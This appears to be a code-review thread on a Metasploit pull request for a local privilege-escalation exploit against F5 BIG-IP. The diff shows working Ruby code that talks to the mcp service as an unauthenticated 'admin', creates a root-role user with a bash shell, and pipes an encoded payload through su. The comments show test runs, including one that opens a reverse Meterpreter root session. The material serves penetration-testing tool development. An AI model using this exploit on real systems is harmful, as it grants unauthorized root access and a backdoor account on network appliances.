modules/exploits/linux/local/f5_create_user.rb

```diff
@@ -0,0 +1,157 @@
+    if !hashed_password || hashed_password.empty?
+      fail_with(Failure::BadConfig, 'Failed to hash the password with String.crypt')
+    end
+
+    # These requests have to go in a single 'session', which, to us, is
+    # a single packet (since we don't have AF_UNIX sockets)
+    result = mcp_send_recv([
+      # Authenticate as 'admin' (this probably shouldn't work but does)
+      mcp_build('user_authenticated', 'structure', [
+        mcp_build('user_authenticated_name', 'string', 'admin')
+      ]),
+
+      # Start transaction
+      mcp_build('start_transaction', 'structure', [
+        mcp_build('start_transaction_load_type', 'ulong', 0)
+      ]),
+
+      # Create the role mapping
+      mcp_build('create', 'structure', [
+        mcp_build('user_role_partition', 'structure', [
+          mcp_build('user_role_partition_user', 'string', username),
+          mcp_build('user_role_partition_role', 'ulong', 0),
+          mcp_build('user_role_partition_partition', 'string', '[All]'),
+        ])
+      ]),
+
+      # Create the userdb entry
+      mcp_build('create', 'structure', [
+        mcp_build('userdb_entry', 'structure', [
+          mcp_build('userdb_entry_name', 'string', username),
+          mcp_build('userdb_entry_partition_id', 'string', 'Common'),
+          mcp_build('userdb_entry_is_system', 'ulong', 0),
+          mcp_build('userdb_entry_shell', 'string', '/bin/bash'),
+          mcp_build('userdb_entry_is_crypted', 'ulong', 1),
+          mcp_build('userdb_entry_passwd', 'string', hashed_password),
+        ])
+      ]),
+
+      # Finish the transaction
+      mcp_build('end_transaction', 'structure', [])
+    ])
+
+    # Handle errors
+    if result.nil?
+      fail_with(Failure::Unknown, 'Request to mcp appeared to fail')
+    end
+
+    # The only result we really care about is an error
+    error_returned = false
+    result.each do |r|
+      result = mcp_get_single(r, 'result')
+      result_code = mcp_get_single(result, 'result_code')
+
+      # If there's no code or it's zero, just ignore it
+      if result_code.nil? || result_code == 0
+        next
+      end
+
+      # If we're here, an error was returned!
+      error_returned = true
+
+      # Otherwise, try and get result_message
+      result_message = mcp_get_single(result, 'result_message')
+      if result_message.nil?
+        print_warning("mcp query returned a non-zero result (#{result_code}), but no error message")
+      else
+        print_error("mcp query returned an error message: #{result_message} (code: #{result_code})")
+      end
+    end
+
+    # Let them know if it likely worked
+    if !error_returned
+      print_good("Service didn't return an error, so user was likely created!")
+
+      if datastore['CREATE_SESSION']
+        print_status('Attempting create a root session...')
+
+        out = cmd_exec("echo -ne \"#{password}\\n#{password}\\n#{new_password}\\n#{new_password}\\n#{payload.encoded}\\n\" | su #{username}")
```

Comment:
When running the module the user with root privs gets created but when trying to return the session, this line has been erroring for me:

```
msf6 exploit(linux/local/f5_create_user) > run

[*] Started reverse TCP handler on 192.168.2.114:4444
[*] Will attempt to create user msfuser / rewV8IDpMeK0, then change password to N0tpassword! when creating a session
[*] Hashing the password with a pseudorandom salt
[+] Service didn't return an error, so user was likely created!
[*] Attempting create a root session...
[*] Output from su command: Password: su: Authentication failure
[*] Exploit completed, but no session was created.
```

I don't think the password is getting set correctly when the user is getting created. After running the module checking `/etc/shadow` is populated with the following but the password I set doesn't seem to work:
```
msfuser:$6C4Bhe/I.GRg:0:0:99999:7:::
```

Seeing similar behaviour when setting CREATE_SESSION to false:
```
^Cmsf6 exploit(linux/local/f5_create_user) > set username msfuser1
username => msfuser1
msf6 exploit(linux/local/f5_create_user) > run

[*] Started reverse TCP handler on 192.168.2.114:4444
[*] Will attempt to create user msfuser1 / N0tpassword!
[*] Hashing the password with a pseudorandom salt
[+] Service didn't return an error, so user was likely created!
[*] Exploit completed, but no session was created.
```

I've been testing on:
```
[root@localhost:NO LICENSE:Standalone] tmp # tmsh show sys version

Sys::Version
Main Package
  Product     BIG-IP
  Version     17.0.0.1
  Build       0.0.4
  Edition     Point Release 1
  Date        Fri Jul 15 01:45:12 PDT 2022
 ```
 @rbowes-r7, any idea what might be causing an issue here?

Reply:
Works when running `msfconsole` on linux.  As discussed at module hacking my original testing was done on MacOS and likely didn't work due to the use of the `crypt` function
```
msf6 exploit(linux/local/f5_create_user) > set session 2
session => 2
msf6 exploit(linux/local/f5_create_user) > run

[*] Started reverse TCP handler on 172.16.199.158:4444
[*] Will attempt to create user IxDuIZgt / Avi3GqQuAUle, then change password to xNXegIDs4doK when creating a session
[+] Service didn't return an error, so user was likely created!
[*] Attempting create a root session...
[*] Sending stage (24380 bytes) to 172.16.199.133
[*] Meterpreter session 3 opened (172.16.199.158:4444 -> 172.16.199.133:41948) at 2023-01-05 12:17:20 -0800

meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer        : localhost.localdomain
OS              : Linux 3.10.0-862.14.4.el7.ve.x86_64 #1 SMP Thu Jul 14 23:41:24 PDT 2022
Architecture    : x64
System Language : en_US
Meterpreter     : python/linux
meterpreter >
```